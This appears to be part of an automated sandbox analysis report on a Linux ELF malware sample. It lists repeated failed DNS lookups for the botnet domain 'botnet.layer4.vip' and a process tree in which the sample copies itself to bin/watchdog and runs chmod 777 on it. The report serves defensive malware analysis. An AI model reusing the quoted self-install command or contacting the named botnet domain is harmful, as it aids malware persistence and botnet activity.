                                  Apr 9, 2023 03:32:31.037086964 CEST8.8.8.8192.168.2.230x7b60Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.061470032 CEST8.8.8.8192.168.2.230x7b60Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.077486992 CEST8.8.8.8192.168.2.230x7b60Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.117924929 CEST8.8.8.8192.168.2.230x7b60Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.142636061 CEST8.8.8.8192.168.2.230x5482Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.158809900 CEST8.8.8.8192.168.2.230x5482Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.248388052 CEST8.8.8.8192.168.2.230xf6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.263989925 CEST8.8.8.8192.168.2.230xf6cdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.423362017 CEST8.8.8.8192.168.2.230x2350Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.487653971 CEST8.8.8.8192.168.2.230x159Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.503161907 CEST8.8.8.8192.168.2.230x159Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.631750107 CEST8.8.8.8192.168.2.230x7794Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.720952988 CEST8.8.8.8192.168.2.230x29b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.760900021 CEST8.8.8.8192.168.2.230x549Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.800951004 CEST8.8.8.8192.168.2.230x549Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.825035095 CEST8.8.8.8192.168.2.230x549Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.849452972 CEST8.8.8.8192.168.2.230x549Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.904830933 CEST8.8.8.8192.168.2.230x53c6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.960711002 CEST8.8.8.8192.168.2.230x95fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.009531021 CEST8.8.8.8192.168.2.230x95fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.025387049 CEST8.8.8.8192.168.2.230x95fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.049539089 CEST8.8.8.8192.168.2.230x95fbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.073995113 CEST8.8.8.8192.168.2.230xe56bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.129806042 CEST8.8.8.8192.168.2.230xe56bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.145311117 CEST8.8.8.8192.168.2.230xe56bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.201301098 CEST8.8.8.8192.168.2.230xa771Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.241166115 CEST8.8.8.8192.168.2.230xa771Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.265588045 CEST8.8.8.8192.168.2.230xa690Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.281400919 CEST8.8.8.8192.168.2.230xa690Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.352905989 CEST8.8.8.8192.168.2.230xb0c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.377033949 CEST8.8.8.8192.168.2.230xb0c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.392569065 CEST8.8.8.8192.168.2.230xb0c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.408356905 CEST8.8.8.8192.168.2.230xb0c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.432375908 CEST8.8.8.8192.168.2.230xb0c4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.447937965 CEST8.8.8.8192.168.2.230x6519Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.463426113 CEST8.8.8.8192.168.2.230x6519Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.503201962 CEST8.8.8.8192.168.2.230x6519Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:32.543178082 CEST8.8.8.8192.168.2.230x942cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false

                                  System Behavior

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/tmp/k9fBkBGZNf.elf
                                  Arguments:/tmp/k9fBkBGZNf.elf
                                  File size:4379400 bytes
                                  MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/tmp/k9fBkBGZNf.elf
                                  Arguments:n/a
                                  File size:4379400 bytes
                                  MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/bin/sh
                                  Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/k9fBkBGZNf.elf bin/watchdog; chmod 777 bin/watchdog"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/bin/sh
                                  Arguments:n/a
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/usr/bin/rm
                                  Arguments:rm -rf bin/watchdog
                                  File size:72056 bytes
                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/bin/sh
                                  Arguments:n/a
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/usr/bin/mkdir
                                  Arguments:mkdir bin
                                  File size:88408 bytes
                                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/bin/sh
                                  Arguments:n/a
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/usr/bin/mv
                                  Arguments:mv /tmp/k9fBkBGZNf.elf bin/watchdog
                                  File size:149888 bytes
                                  MD5 hash:504f0590fa482d4da070a702260e3716

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/bin/sh
                                  Arguments:n/a
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/usr/bin/chmod
                                  Arguments:chmod 777 bin/watchdog
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/tmp/k9fBkBGZNf.elf
                                  Arguments:n/a
                                  File size:4379400 bytes
                                  MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/tmp/k9fBkBGZNf.elf
                                  Arguments:n/a
                                  File size:4379400 bytes
                                  MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                                  Start time:03:30:27
                                  Start date:09/04/2023
                                  Path:/tmp/k9fBkBGZNf.elf
                                  Arguments:n/a
                                  File size:4379400 bytes
                                  MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e